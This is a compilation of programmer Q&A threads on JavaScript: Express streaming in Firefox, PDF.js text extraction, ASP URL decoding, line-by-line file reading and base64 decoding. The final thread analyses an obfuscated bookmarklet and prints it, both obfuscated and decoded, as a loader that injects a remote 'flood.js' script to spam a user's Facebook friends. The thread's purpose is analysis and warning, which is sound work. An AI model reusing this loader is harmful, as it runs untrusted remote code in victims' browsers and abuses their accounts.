Firefox splits up Express response readableStream sometimes - javascript

I'm trying to stream HTML strings from my Express backend using a series of response.write calls to give a sense of real-time updating, since I'm doing some HTTP requests in the middle, then appending them to the DOM. For context, part of my response is a pseudocode fragment extracted from a given Wiki page.
Everything works fine in Chrome; however, Firefox sometimes seems to split the stream into two, and the client then can't parse the HTML string because it gets split halfway through a tag.
Again, sometimes Firefox takes the larger response as a whole and works fine, but most often it splits it.
Is this something to do with how Firefox reads ReadableStreams compared to Chrome? Or am I missing something in my code?
Edit: How the stream gets split (too low rep to embed the image)
Stream being sent:
res.write(`<p class="update">→ Fetching page content...</p>`);
//Querying Wiki API here (code not shown)
//returning parsed HTML
parsed_frag = parsed_frag.replace(/\\n/g, '<br />');
res.write(`<p class="program">→ Fragment ${frag_num + 1} for ${response.data.parse.displaytitle}:</p>`);
res.write(`<div id="0" class="result">${parsed_frag}</div>`);
res.write(`<p class="program">→ (C = copy to clipboard, N = next fragment, R = restart)</p>`);
res.write(`<div class="program">~/pseudo-fetcher<div id="key-input" class="input key-input" contenteditable="true"></div></div>`);
res.status(200).end();
The parsed_frag variable holds the extracted HTML in a string. I want the whole thing to be read as a single part, rather than randomly split when read. Since I'm using res.write beforehand, res.send isn't useful.
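One point worth noting about the behaviour described above: the chunks a browser delivers from a streamed response are not guaranteed to line up with the individual res.write calls, so a reader may be handed half a tag. Below is a minimal sketch of one way to cope, assuming the server is changed to append a marker after each complete fragment. The marker string and the helper name createFragmentBuffer are hypothetical and not part of the original code.

```javascript
// Hypothetical marker the server would write after every complete HTML fragment,
// e.g. res.write(html + FRAGMENT_END). The value itself is an assumption.
var FRAGMENT_END = "<!--end-->";

// Collects streamed text and returns only the fragments that have fully arrived.
function createFragmentBuffer(marker) {
  var pending = ""; // text received so far that is not yet a complete fragment
  return {
    push: function (text) {
      pending += text;
      var parts = pending.split(marker);
      pending = parts.pop(); // whatever follows the last marker is still incomplete
      return parts;
    }
  };
}

// Simulate a stream that was split halfway through a tag.
var buffer = createFragmentBuffer(FRAGMENT_END);
var first = buffer.push('<p class="update">Fetching...</p><!--end--><div id="0" cla');
var second = buffer.push('ss="result">fragment</div><!--end-->');
console.log(first);  // only the complete <p> element
console.log(second); // the <div>, reassembled from both chunks
```

On the client, the text passed to push would typically come from response.body.getReader(), decoded with a TextDecoder in streaming mode, and each returned fragment could then be appended to the DOM.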

PDF.js returns text contents of the whole Document as each Page's textContent

I'm building a client-side app that uses PDF.js to parse the contents of a selected PDF file, and I'm running into a strange issue.
Everything seems to be working great. The code successfully loads the PDF.js PDF object, which then loops through the Pages of the document, and then gets the textContent for each Page.
After I let the code below run, and inspect the data in browser tools, I'm noticing that each Page's textContent object contains the text of the entire document, not ONLY the text from the related Page.
Has anybody experienced this before?
I pulled (and modified) most of the code I'm using from PDF.js posts here, and it's pretty straight-forward and seems to perform exactly as expected, aside from this issue:
testLoop: function (event) {
  var file = event.target.files[0];
  var fileReader = new FileReader();
  fileReader.readAsArrayBuffer(file);
  fileReader.onload = function () {
    var typedArray = new Uint8Array(this.result);
    PDFJS.getDocument(typedArray).then(function (pdf) {
      for (var i = 1; i <= pdf.numPages; i++) {
        pdf.getPage(i).then(function (page) {
          page.getTextContent().then(function (textContent) {
            console.log(textContent);
          });
        });
      }
    });
  };
},
Additionally, the sizes of the returned textContent objects are slightly different for each Page, even though all of the objects share a common last object: the last bit of text for the whole document.
Here is an image of my inspector to illustrate that the objects are all very similarly sized.
Through manual inspection of the objects in the inspector shown, I can see that the data from Page #1, for example, should really only consist of about 140 array items, so why does the object for that page contain 700 or so? And why the variation?
It looks like the issue here is the formatting of the PDF document I'm trying to parse. The PDF contains government records in a tabular format, which apparently was not composed according to modern PDF standards.
I've tested the script with different PDF files (which I know are properly composed), and the Page textContent objects returned are correctly split based on the content of the Pages.
In case anyone else runs into this issue in the future, there are at least two possible ways to handle the problem that I have thought of so far:
Somehow reformat the malformed PDF to use updated standards, then process it. I don't know how to do this, nor am I sure it's realistic.
Select the largest of the returned Page textContent objects (since they all contain more or less the full text of the document) and do your operations on that textContent object.
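The second workaround can be sketched as follows. This is only an illustration, assuming each textContent object exposes an items array, as the objects logged above appear to. pickLargestTextContent is a hypothetical helper name and the sample data is made up.

```javascript
// Returns the textContent object with the most items (hypothetical helper).
// Note: reduce without an initial value throws on an empty array.
function pickLargestTextContent(textContents) {
  return textContents.reduce(function (largest, current) {
    return current.items.length > largest.items.length ? current : largest;
  });
}

// Made-up stand-ins for the objects returned by page.getTextContent().
var samples = [
  { items: [{ str: "a" }, { str: "b" }] },
  { items: [{ str: "a" }, { str: "b" }, { str: "c" }] },
  { items: [{ str: "a" }] }
];
var largest = pickLargestTextContent(samples);
console.log(largest.items.map(function (item) { return item.str; }).join(" "));
```

In the loop from the question, the per-page promises could be collected into an array and passed to Promise.all, so that the helper only runs once every page's textContent is available.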

URL Decoding with Serverside JS in ASP

I have a problem which is due to IIS no longer treating + as a space in querystrings.
We have clients posting some data (jobs) to a hidden page as a querystring, and they sometimes post jobs containing things like C++. As they are passing the data, we cannot expect them to encode it properly as %2B: they are mostly non-technical, and sometimes they mix and match, which is fun.
We also have places where we have querystrings within querystrings (sometimes up to 4 when passing filenames into a flash file for the click link, then the redirect url onclick that goes to a page that logs the click then the final url to go to show the customer!).
There are also other places where we have URLs in URLS such as redirect on login and so on.
Plus signs shouldn't really be a problem but we have found a few issues where they are so I just want one function that can sort it out.
For the times when we have needed to decode URLs in ASP (there being no Server.URLDecode function), even though we mostly don't need to because the page un-encodes them, we use a server-side JavaScript function in Classic ASP (I know!), e.g.
<script language="JavaScript" RUNAT="SERVER">
function URLDecode(strIN)
{
// JS will return undefined for vars that have not been set yet whereas VB doesn't so handle
if(strIN){
var strOUT = decodeURIComponent(strIN);
return strOUT;
}else{ //for undefined or nulls or empty strings just return an empty string
return "";
}
}
</script>
However I am trying to get round any possible problems with + signs with a simple hack where I replace it first with a placeholder then replace it back after decoding e.g
<script language="JavaScript" RUNAT="SERVER">
function URLDecode(strIN)
{
// JS will return undefined for vars that have not been set yet whereas VB doesn't so handle
if(strIN){
strIN = strIN.replace("+","##PLUS##");
var strOUT = decodeURIComponent(strIN);
strOUT = strOUT.replace("##PLUS##","+")
return strOUT;
}else{ //for undefined or nulls or empty strings just return an empty string
return "";
}
}
</script>
However on running this I am getting the following error
Microsoft JScript runtime error '800a01b6'
Object doesn't support this property or method
/jobboard/scripts/VBS/EncodeFuncLib.asp, line 781
this line is
strIN = strIN.replace("+","##PLUS##");
I've tried
strIN = strIN.replace(/\+/g,"##PLUS##");
strIN = strIN.replace('/\+/','##PLUS##');
But nothing seems to work.
Running this code as client side JavaScript works fine so I don't know why it's not running server side.
I don't want to have to search 300+ files for places where this function is called server side and wrap each URLDecode call in the placeholder/replace logic, so I would like to know what the problem is and how to solve it.
At first I thought it was because we had moved to Windows 2012 and IIS 8 and there was a new JS.dll that needed to be installed (from reading up on it); however, we still have some 2003 servers on IIS 7 and I am getting the same problem there as well.
Unless my server guy isn't telling me something like the version of IIS we are using on 2003 I don't know what is going on.
Can anybody shed some light on this?
Am I being a numpty?
What could be the issue?
Thanks in advance for any help.
The regex to replace plus signs is strIN = strIN.replace(/\+/g,"##PLUS##"); Because + has a meaning in regex, it needs to be escaped with a backslash.
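A minimal sketch of the placeholder approach using the escaped, global regex. Two assumptions here go beyond the answer above: that the "Object doesn't support this property or method" error arises because the value passed in is not a JScript string (for example an item taken straight from Request.QueryString), which is why the input is coerced with String() first; and that the restore step should be global too, since replace with a plain string pattern only swaps the first occurrence.

```javascript
function URLDecode(strIN) {
  // Undefined, null and empty values just return an empty string.
  if (!strIN) {
    return "";
  }
  // Assumption: coerce to a real string so that .replace is available.
  var protectedStr = String(strIN).replace(/\+/g, "##PLUS##");
  var strOUT = decodeURIComponent(protectedStr);
  // Restore every placeholder, not only the first one.
  return strOUT.replace(/##PLUS##/g, "+");
}

console.log(URLDecode("C++%20developer")); // literal plus signs are kept
console.log(URLDecode("C%2B%2B"));         // encoded plus signs decode as usual
```

Because the coercion happens inside the function, the callers spread across the other files would not need to change.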

Javascript using FileReader to read line by line

This question is close but not quite close enough.
My HTML5 application reads a CSV file (although it applies to text as well) and displays some of the data on screen.
The problem I have is that the CSV files can be huge (with a 1GB file size limit). The good news is, I only need to display some of the data from the CSV file at any point.
The idea is something like (pseudocode)
var content;
var reader = OpenReader(myCsvFile)
var line = 0;
while (reader.hasLinesRemaining)
if (line % 10 == 1)
content = currentLine;
Loop to next line
There are enough articles about how to read the CSV file, I'm using
function openCSVFile(csvFileName){
var r = new FileReader();
r.onload = function(e) {
var contents = e.target.result;
var s = "";
};
r.readAsText(csvFileName);
}
but I can't see how to read a line at a time in JavaScript, or even whether it's possible.
My CSV data looks like
Some detail: date, ,
More detail: time, ,
val1, val2
val11, val12
#val11, val12
val21, val22
I need to strip out the first 2 lines, and also decide what to do with the line starting with a # (which is why I need to read through a line at a time).
So, other than loading the lot into memory, do I have any options for reading a line at a time?
There is no readLine() method to do this as of now. However, some ideas to explore:
Reading from a blob does fire progress events. While it is not required by the specification, the engine might prematurely populate the .result property similar to an XMLHttpRequest.
The Streams API drafts a streaming .read(size) method for file readers. I don't think it is already implemented anywhere, though.
Blobs do have a slice method which returns a new Blob containing a part of the original data. The spec and the synchronous nature of the operation suggest that this is done via references, not copying, and should be quite performant. This would allow you to read the huge file chunk-by-chunk.
Admittedly, none of these methods automatically stops at line endings. You will need to buffer the chunks manually, break them into lines and shift them out once they are complete. Also, these operations work on bytes, not on characters, so there might be encoding problems with multi-byte characters that need to be handled.
See also: Reading line-by-line file in JavaScript on client side
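The buffering described above can be sketched as follows. This is a minimal illustration, not a complete reader: createLineReader is a hypothetical helper, the input is assumed to be UTF-8, and the chunks are assumed to arrive as Uint8Array slices (for example from file.slice(start, end) read with readAsArrayBuffer). A TextDecoder in streaming mode holds back a multi-byte character that is cut in half by a chunk boundary.

```javascript
// Hypothetical helper: turns a sequence of byte chunks into complete lines.
function createLineReader(onLine) {
  var decoder = new TextDecoder("utf-8"); // remembers partial multi-byte characters
  var pending = "";                       // text after the last line break seen so far

  function emitCompleteLines() {
    var parts = pending.split(/\r?\n/);
    pending = parts.pop(); // the last piece is an unfinished line (or "")
    parts.forEach(function (line) { onLine(line); });
  }

  return {
    push: function (bytes) {
      pending += decoder.decode(bytes, { stream: true });
      emitCompleteLines();
    },
    end: function () {
      pending += decoder.decode(); // flush anything the decoder held back
      if (pending !== "") {
        onLine(pending);
      }
      pending = "";
    }
  };
}

// Feed the sample data in arbitrary 7-byte chunks.
var lines = [];
var reader = createLineReader(function (line) { lines.push(line); });
var bytes = new TextEncoder().encode("Some detail: date, ,\nval1, val2\n#val11, val12");
for (var i = 0; i < bytes.length; i += 7) {
  reader.push(bytes.subarray(i, i + 7));
}
reader.end();
console.log(lines);
```

The onLine callback is where lines could be skipped, for instance the first two header lines or any line starting with #, so only the current chunk and one partial line are held in memory at a time.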

DOM Exception 5 INVALID CHARACTER error on valid base64 image string in javascript

I'm trying to decode a base64 string for an image back into binary so it can be downloaded and displayed locally by an OS.
The string I have successfully renders when put as the src of an HTML IMG element with the data URI preface (data: img/png;base64, ) but when using the atob function or a goog closure function it fails.
However decoding succeeds when put in here: http://www.base64decode.org/
Any ideas?
EDIT:
I successfully got it to decode with a library other than the built-in JS function. But it still won't open locally: a Mac says it's damaged or in an unknown format and can't be opened.
The code is just something like:
imgEl.src = 'data:img/png;base64,' + contentStr; //this displays successfully
decodedStr = window.atob(contentStr); //this throws the invalid char exception but i just
//used a different script to get it decode successfully but still won't display locally
the base64 string itself is too long to display here (limit is 30,000 characters)
I was just banging my head against the wall on this one for a while.
There are a couple of possible causes of the problem. One is UTF-8 problems; there's a good write-up and a solution for that here.
In my case, I also had to make sure all the whitespace was out of the string before passing it to atob. e.g.
function decodeFromBase64(input) {
input = input.replace(/\s/g, '');
return atob(input);
}
What was really frustrating was that the base64 parsed correctly using the base64 library in python, but not in JS.
I had to remove the data:audio/wav;base64, in front of the b64, as this was given as part of the b64.
var data = b64Data.substring(b64Data.indexOf(',')+1);
var processed = atob(data);
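The two fixes above (dropping the data URI prefix and removing whitespace) can be combined. This is a minimal sketch with hypothetical helper names; it assumes the environment provides atob, and it returns raw bytes rather than a string so that the result can be saved as binary data.

```javascript
// Strips a leading "data:...;base64," prefix and all whitespace (hypothetical helper).
function normalizeBase64(input) {
  var s = String(input);
  if (s.indexOf("data:") === 0) {
    s = s.substring(s.indexOf(",") + 1);
  }
  return s.replace(/\s/g, "");
}

// Decodes to raw bytes; atob returns a "binary string" with one character per byte.
function base64ToBytes(input) {
  var binary = atob(normalizeBase64(input));
  var bytes = new Uint8Array(binary.length);
  for (var i = 0; i < binary.length; i++) {
    bytes[i] = binary.charCodeAt(i);
  }
  return bytes;
}

console.log(normalizeBase64("data:image/png;base64, aGVs\nbG8="));
```

The byte array can be wrapped in a Blob for download. Writing the decoded string out as text instead may alter the bytes, which is one possible reason a saved image is reported as damaged.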

Can someone decrypt this javascript

I found it in a forum post that said this code would give me auto play for Facebook games, but I'm afraid it doesn't do what they say and that it is a malicious script.
Please help :)
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
Let's start by decoding the escape sequences, and get rid of that _0x8dd5 variable name:
var x=[
"src","script","createElement","http://ug-radio.co.cc/flood.js",
"appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);
Substituting the string from the array, you are left with:
(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);
So, what the script does is simply:
a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);
I.e. it loads the Javascript http://ug-radio.co.cc/flood.js in the page.
Looking at the script in the file that is loaded, it calls itself "Wallflood By X-Cisadane". It seems to get a list of your friends and post a message to (or perhaps from) all of them.
Certainly nothing to do with auto play for games.
I opened firebug, and pasted part of the script into the console (being careful to only paste the part that created a variable, rather than running code). This is what I got:
what I pasted:
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
the result:
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
In short, this looks like a script to load an external Javascript file from a remote server with a very dodgy looking domain name.
There are a few characters which are not converted quite to what you'd expect: stray spaces split some of the escape sequences (for example "\x7 2"), so they no longer decode to the intended characters. This could be typos, an artifact of the forum breaking up the long line, or deliberate further obfuscation to fool any automated malware checker looking for scripts containing URLs or references to createElement, etc. The remainder of the script does not repair those characters; it only indexes into the array, so as pasted it cannot run as intended until the stray spaces are removed.
The variable name _0x8dd5 is chosen to look like hex code and make the whole thing harder to read, but in fact it's just a regular Javascript variable name. It is referenced repeatedly in the rest of the script, which uses it only to look up the strings by index.
Definitely a malicious script.
I recommend burning it immediately! ;-)
Well, the declared var is actually this:
var _0x8dd5= [
'src', 'script', 'cx7 2eateElement',
'x 68ttp://ug-rad io.co.cc/flox 6Fd.js', 'appendC x68ild', 'body'
];
The rest is simple to figure out.
Well your first statement is setting up an array with roughly the following contents:
var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];
I say "roughly" because I'm using Chrome's JavaScript console to parse the data, and some things seem to be a bit garbled. I've cleaned up the garbled portions as best as I can.
The rest appears to be calling something along the lines of:
var b = document;
var a = b.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
b.body.appendChild(a);
So basically, it is adding a (probably malicious) script to the document.
You most probably know how to decode this or how it was encoded, but for those who aren't sure, it is nothing but 2-digit hexadecimal escape sequences. It could also be the 4-digit form using \udddd (e.g. "\u0032" is "2") or \ddd for octal.
Decoding hex string in javascript
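For anyone who would rather not paste suspicious code into a console at all, the escapes can be decoded as plain text. This is a minimal sketch: decodeEscapes is a hypothetical helper that handles only the \xNN and \uNNNN forms mentioned above (not octal), and it never evaluates the input.

```javascript
// Decodes \xNN and \uNNNN escapes in source text without evaluating it (hypothetical helper).
function decodeEscapes(source) {
  return source.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})/g, function (match, hex2, hex4) {
    return String.fromCharCode(parseInt(hex2 || hex4, 16));
  });
}

// The doubled backslashes keep the escapes as literal text here,
// as they would be when read from a file or a textarea.
var obfuscated = '["\\x73\\x72\\x63","\\x73\\x63\\x72\\x69\\x70\\x74","\\x62\\x6F\\x64\\x79"]';
console.log(decodeEscapes(obfuscated)); // ["src","script","body"]
```

Sequences that are not well formed, such as the ones broken up by stray spaces in the question, are left untouched, which makes them easy to spot in the output.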
